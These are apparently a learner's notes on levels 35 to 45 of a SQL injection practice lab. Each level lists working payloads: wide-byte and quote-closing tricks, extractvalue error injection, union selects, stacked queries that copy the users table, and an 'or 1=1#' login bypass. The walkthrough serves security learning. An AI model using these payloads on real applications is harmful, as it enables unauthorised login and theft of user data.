35关知识点:
- 宽字节注入
- 数值型注入
- 错误注入
- payload:id=1+and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
- 联合注入
- payload:id=0+union+select+1,database(),version()--+
36关知识点:
- 字符型注入
- 宽字节注入
- 错误注入
- payload:id=1%df%27and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
- 联合注入
- payload:id=0%df%27union+select+1,database(),version()--+
37关知识点:
- 宽字节注入(bp抓包实现,不要直接在输入框中输入下面payload)
- 字符型注入
- 联合注入
- payload:uname=1%df'union+select+database(),version()--+
- 错误注入
- payload:uname=1%df'and+extractvalue(1,concat(0x7e,database(),0x7e))--+
38关知识点:
- 字符型注入+单引号闭合
- 错误注入
- payload:id=1%27and+extractvalue(1,concat(0x7e,database(),0x7e))=%271
- 联合注入
- payload:id=0%27union+select+1,database(),version()--+
39关知识点:
- 数值型注入
- 错误注入
- payload:id=1+and%20extractvalue(1,concat(0x7e,database(),0x7e))=0
- 联合注入
- payload:id=0+union+select+1,version(),database()
40关知识点:
- 字符型注入
- 测试发现原始语句是 where id=('输入')
- 联合注入
- payload:id=0%27)union+select+1,database(),3%20and+1=(%271
- 没有回显信息,不能进行错误注入
41关知识点:
- 数值型注入
- 联合注入
- payload:id=0%20union+select+1,database(),version()
- 没有回显信息,不能进行错误注入
- 堆叠注入
- payload:id=1;create%20table%20ren(id%20int);--+
- payload:id=1;create%20table%20ren(id%20int);--+
42关知识点:
- 密码位置可以单引号绕过
- payload:passwd='or+1=1#
- 堆叠注入
- payload:passwd=';create table ren like users;# (创建一个新表ren,格式和users一样)
- payload:passwd=';insert into ren select * from users;# (将users的内容插入到ren表中)
43关知识点:
- 密码处读取输入为 where passwd=('输入')
- payload:passwd=1')or 1=1#
- 堆叠注入
- payload:passwd=');create table ren like users;# (创建一个新表ren,格式和users一样)
- payload:passwd=');insert into ren select * from users;# (将users的内容插入到ren表中)
44关知识点:
- 和42关的payload一模一样
- 直接过了
45关知识点:
- 和43关一样的payload
- 直接过了
10